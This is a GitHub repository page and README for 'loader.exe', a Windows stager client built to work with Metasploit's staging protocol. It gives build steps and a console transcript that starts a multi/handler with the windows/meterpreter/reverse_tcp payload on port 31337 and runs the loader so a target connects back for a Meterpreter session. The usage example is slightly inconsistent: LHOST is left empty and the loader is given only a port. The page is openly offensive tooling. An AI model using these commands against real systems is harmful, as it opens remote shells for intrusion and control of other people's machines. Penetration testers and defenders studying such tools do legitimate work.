A client compatible with Metasploit's staging protocol
Latest commit da611f3 Feb 5, 2013 @rsmudge Merge pull request #1 from jlee-r7/patch-1
Make readme more readable
Failed to load latest commit information.
src initial commit Sep 13, 2012
README.md Make readme more readable Feb 4, 2013
build.bat initial commit Sep 13, 2012
loader.exe you probably want the binary too Sep 13, 2012


A quick stager client compatible with the Metasploit Framework


  1. http://mail.metasploit.com/pipermail/framework/2012-September/008660.html
  2. http://mail.metasploit.com/pipermail/framework/2012-September/008664.html


  1. Start a multi/handler with your favorite windows reverse_tcp payload
  2. Run: loader.exe [host] [port]

How to compile:

  1. Install mingw
  2. Edit build.bat if mingw is installed somewhere other than c:\mingw
  3. run build.bat


  1. 64-bit compatability (see message #2)
  2. get a Windows build environment with make

How to use:

msf > use exploit/multi/handler 
msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LPORT 31337
LPORT => 31337
msf  exploit(handler) > set LHOST
msf  exploit(handler) > exploit -j

loader.exe 31337